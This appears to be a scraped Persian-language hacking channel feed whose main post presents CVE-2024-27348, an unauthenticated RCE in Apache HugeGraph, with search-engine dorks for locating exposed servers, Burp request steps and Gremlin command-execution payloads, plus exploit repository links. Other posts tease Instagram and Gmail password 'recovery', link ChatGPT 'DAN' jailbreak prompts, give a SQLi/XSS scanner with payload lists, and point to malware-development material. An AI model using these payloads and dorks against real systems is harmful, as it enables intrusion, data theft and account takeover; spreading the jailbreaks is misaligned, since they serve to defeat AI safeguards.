2.4M حجم رسانه بالاست
مشاهده در ایتا
🔻🎥بازیابی رمز اینستاگرام و جیمیل در ۳۰ ثانیه!
🔓 CVE-2024-27348 — آسیبپذیری بحرانی RCE در Apache HugeGraph-Server 🔓
🟢 CVE-2024-27348 یک آسیبپذیری بسیار مهم و بحرانی (Critical) با امتیاز CVSS 9.8 در Apache HugeGraph-Server است که در نسخههای 1.0.0 تا قبل از 1.3.0 وجود دارد. این آسیبپذیری از نوع Remote Code Execution (اجرای کد از راه دور) بوده و به مهاجم اجازه میدهد بدون احراز هویت، دستورات دلخواه را روی سرور اجرایی کند.
https://nvd.nist.gov/vuln/detail/cve-2024-27348
📌 چه اتفاقی میافتد؟
آسیبپذیری در تعامل با Gremlin (زبان پرسوجوی گراف) یا بخشهای مدیریتی HugeGraph قرار دارد. مهاجم با ارسال ورودیهای خاص میتواند از ضعف کنترل دسترسی سوءاستفاده کند و کد دلخواهش را روی سرور اجرا نماید.
📍 پیامدها:
دسترسی کامل به سیستم
افشای دادههای حساس
نصب بدافزار یا ایجاد بکدور
مختل کردن سرویسها و حذف/تغییر دادهها
👾 shodan dork
1 http.title:"HugeGraph"
2 http.html:"HugeGraph Server"
3 product:"Apache HugeGraph"
4 port:8080 "HugeGraph"
👾 fofa dork
1 app="Apache-HugeGraph"
2 title="HugeGraph"
3 body="HugeGraph Server"
4 server="HugeGraph"
5 body="gremlin" && body="HugeGraph"
6 app="Apache-HugeGraph" && port="8080"
👾ZoomEye Dorks
1 app:"Apache HugeGraph"
2 service:"HugeGraph"
3 title:"HugeGraph"
exploit
http://target.com/gremlin
🧪 روش تست دستی با Burp Suite ( PoC)
1 رهگیری درخواست
Burp → Proxy → Intercept ON
وارد مسیر /gremlin درخاست رو از گت به پست تغیر میدیم
POST /gremlin HTTP/1.1
Host: target:8080
Content-Type: application/json
Content-Length: ...
{
"gremlin": f"def result = \"{ls}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",
}
.....................
payload 1
{
"gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList({formatted_words});Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
payload 2
"gremlin": f"def result = \"{command}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",
}
2
https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE
3 https://github.com/kljunowsky/CVE-2024-27348/blob/main/CVE-2024-27348.py
لیستی از بهترین کتاب های Hکینگ دنیا که توسط افراد خیلی حرفه ای نوشته شدن
Code Block
میدونستید به جای نوشتن template های ناکلی با کمک هوش مصنوعی خودش میتونید ازش بخواید براتونtemplate بنویسه ؟
مثلا ما در تصویر بالا یک template که خودمون نوشته بودیم رو تست کردیم و یک دور هم با هوش مصنوعی(خودش) تست کردیم و جواب میده!
Code Block
روش های دور زدن چت جی پی تی رو از اینجا بردارید :
https://github.com/0xk1h0/ChatGPT_DAN
یک قطعه کد ساده پایتونی که به شما کمک میکنه طریقه عملکرد اسکنر های اسیب پذیری رو بهتر درک کنید
در این قطعه کد اسب پذیری های XSS و Sqli تست میشن⬇️
import requests
import re
import threading
url = "http://python.scanner/labs/greetings.php?id="
payloads = {
"SQLi": ["'", "' OR '1'='1", "\" OR \"1\"=\"1", "'; --", "' UNION SELECT 1,2,3 --"],
"XSS": ["<script>alert('XSS')</script>", "'><img src=x onerror=alert('XSS')>"]
}
sqli_errors = [
"SQL syntax","SQLite3::query():", "MySQL server", "syntax error", "Unclosed quotation mark", "near 'SELECT'",
"Unknown column", "Warning: mysql_fetch", "Fatal error"
]
def scan_payload(vuln_type, payload):
response = requests.get(url, params={"id": payload})
content = response.text.lower()
if vuln_type == "SQLi" and any(error.lower() in content for error in sqli_errors):
print(f"[+] Potential SQL injection detected with payload: {payload}")
elif vuln_type == "XSS" and payload.lower() in content:
print(f"[+] Potential XSS detected with payload: {payload}")
threads = []
for vuln, tests in payloads.items():
for payload in tests:
t = threading.Thread(target=scan_payload, args=(vuln, payload))
threads.append(t)
t.start()
# Wait for all threads to finish
for t in threads:
t.join()
806.5K حجم رسانه بالاست
مشاهده در ایتا
این دستگاه به آن EMP میگویند؛ دستگاهی که میتواند به دستگاههای الکترونیکی آسیب برساند و آنها را تخریب کند. در موشکهای جنگی و سختافزارهای نظامی نیز از این تکنولوژی استفاده میشود.
یک منبع بسیار عالی برای افرادی که میخوان در زمینه بد افزار فعالیت خودشون رو شروع کنن :
https://github.com/malsearchs/Pure-Malware-Development
🖱 🎩 آموزش XpathInjection
❕چکیده مطلب:
آموزش XpathInjection به زبان ساده و عملی؛ بررسی آسیبپذیری XPath Injection، مثالهای واقعی بایپس لاگین، استخراج اطلاعات XML و نکات مهم تست نفوذ وب برای باگ بانتی و امنیت وب💻
⏰ زمان مطالعه : 4 دقیقه
⬅️لینک آموزش➡️
Code Block